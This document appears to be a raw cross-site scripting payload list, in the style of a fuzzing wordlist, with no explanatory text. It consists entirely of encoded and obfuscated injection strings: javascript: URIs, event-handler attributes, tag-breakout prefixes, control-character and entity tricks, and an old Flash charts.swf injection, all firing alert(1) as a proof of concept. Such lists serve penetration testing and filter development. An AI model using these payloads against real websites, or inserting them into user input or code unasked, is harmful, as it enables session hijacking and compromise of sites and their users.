%26lpar;1%26%2341;">
"><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
'/><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
"/><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
</ScRiPt/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
</TiTlE/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
</TeXtArEa/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
</StYlE/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">
</NoScRiPt/<K><a aaaa aa a aaa href%3D"%26%2301jav%0Das%26%2399;ript%26colon;alert
%26lpar;1%26%2341;">

<iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
'/><iframe src=%22java%0Dscript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
"/><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</ScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TiTlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</TeXtArEa/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</StYlE/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--
</NoScRiPt/<K><iframe src=%22javascript%26colon;alert%26lpar;1%26%2341;%%0D3C!--

<body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><body onpageshow%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>

'><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
"><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
'/><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
"/><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</ScRiPt/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</TiTlE/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</TeXtArEa/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</StYlE/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>
</NoScRiPt/<K><link href%3Djavascript%26colon;alert%26lpar;1%26%2341; accesskey%3Dx>

<embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
'/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
"/><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</ScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TiTlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</TeXtArEa/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</StYlE/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>
</NoScRiPt/<K><embed src%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert%26lpar;1%26%2341;>

'><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
"><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
'/><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
"/><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
</ScRiPt/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
</TiTlE/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
</TeXtArEa/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
</StYlE/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>
</NoScRiPt/<K><iframe xmlns%3Dhttp://www.w3.org/1999/xhtml src%3Djavascript%26colon;alert
%26lpar;1%26%2341;>

<object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

'><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

"><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

'/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

"/><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</ScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</TiTlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</TeXtArEa/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</StYlE/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

</NoScRiPt/<K><object data%3Djavascript%26colon;alert%26lpar;1%26%2341;>

<j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
'/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
"/><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</ScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TiTlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</TeXtArEa/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</StYlE/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#
</NoScRiPt/<K><j oNcLiCk%3Dloc%26%2397;tion%3Dinne%26%23114;HTML>javascript:alert(1)#

<SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
'><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
"><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
'/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
"/><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</ScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</TiTlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</TeXtArEa/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</StYlE/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()
</NoScRiPt/<K><SvG OnLoAd%3Dloc%26%2397;tion%3D/ja%26%23118;as/.sou%26%23114;ce%2B/c
%26%23114;ipt:/.sou%26%23114;ce%2B/ale/.sou%26%23114;ce%2B/rt/.sou%26%23114;ce%2Bloc
%26%2397;tion.h%26%2397;sh%26%2391;1%5D%2B1%2Bloc%26%2397;tion.h%26%2397;sh
%26%2391;2%5D>#()

<svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
'><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
"><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
'/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
"/><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</ScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</TiTlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</TeXtArEa/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</StYlE/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)
</NoScRiPt/<K><svg onload%3Dlocation=loc%26%2397;tion.h%26%2397;sh.subst
%26%23114;%26lpar;1%29>#javascript:alert(1)

<SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
'/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
"/><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</ScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TiTlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</TeXtArEa/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</StYlE/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>
</NoScRiPt/<K><SvG OnLoAd%3D%26%2391;1%26%2393;.find%26lpar;al\u0%26%2348;65rt%29;>

<A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt
%29;>X
'><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt
%29;>X
"><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
'/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
"/><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</ScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</TiTlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</TeXtArEa/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</StYlE/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X
</NoScRiPt/<K><A hReF%3Dj%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\
u0%26%2348;65rt%29;>X

<oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)" oNcLiCk

%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
'><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)"
oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
"><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)"
oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
'/><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)"
oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
"/><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler%26%23116(1)"
oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</ScRiPt/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler
%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</TiTlE/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler
%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</TeXtArEa/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler
%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</StYlE/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler
%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>
</NoScRiPt/<K><oUtPuT nAmE%3D"jA%26%23118;AsCriPt%26colon;//%26NewLine;\u0061ler
%26%23116(1)" oNcLiCk%3D"ev%26%2397;l%26lpar;n%26%2397;me%29";>X</oUtPuT>

<vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source

src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
'><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
"><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
'/><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
"/><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</ScRiPt/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</TiTlE/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</TeXtArEa/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</StYlE/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>
</NoScRiPt/<K><vIdEo </onloadeddata%3D"1> (_%3Dalert,_('1'))"" controls><source
src%3D"https://www.w3schools.com/html/mov_bbb.mp4"></vIdEo>

<embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
'/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
"/><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</ScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TiTlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</TeXtArEa/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/
charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</StYlE/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?
allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>
</NoScRiPt/<K><embed src%3D'//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/
charts.swf?allowedDomain%3D\"})))}catch(e){alert(1337)}//' allowscriptaccess%3Dalways>

<jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame%2BinnerHTML
%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
'/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
"/><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</ScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TiTlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</TeXtArEa/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag
%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</StYlE/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag%26%2378;ame
%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)
</NoScRiPt/<K><jAvAsCrIpT:/*%0AoNcLiCk%3Dlo%26%2399;at%26%23105;on%3Dtag
%26%2378;ame%2BinnerHTML%2Blocation%26%2346;hash>/*click me!#*/alert(1)

'>
">
'/>
"/>
</ScRiPt/<K>
</TiTlE/<K>
</TeXtArEa/<K>
</StYlE/<K>
</NoScRiPt/<K>

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title
onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body
onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset
onScroll>
<script onReadyStateChange script
onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body
onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body
onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound
onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html
onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html
onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe
onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style
onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset
onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html
onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html
onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body
onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html
onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee
onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml
onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet
onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body
onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html
onMouseMove>
<applet onreadystatechange applet
onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html
onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object
onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body
onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe
onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html
onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>

--> <img src=xxx:x onerror=javascript:alert(1)> -->
-->
-->
-->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
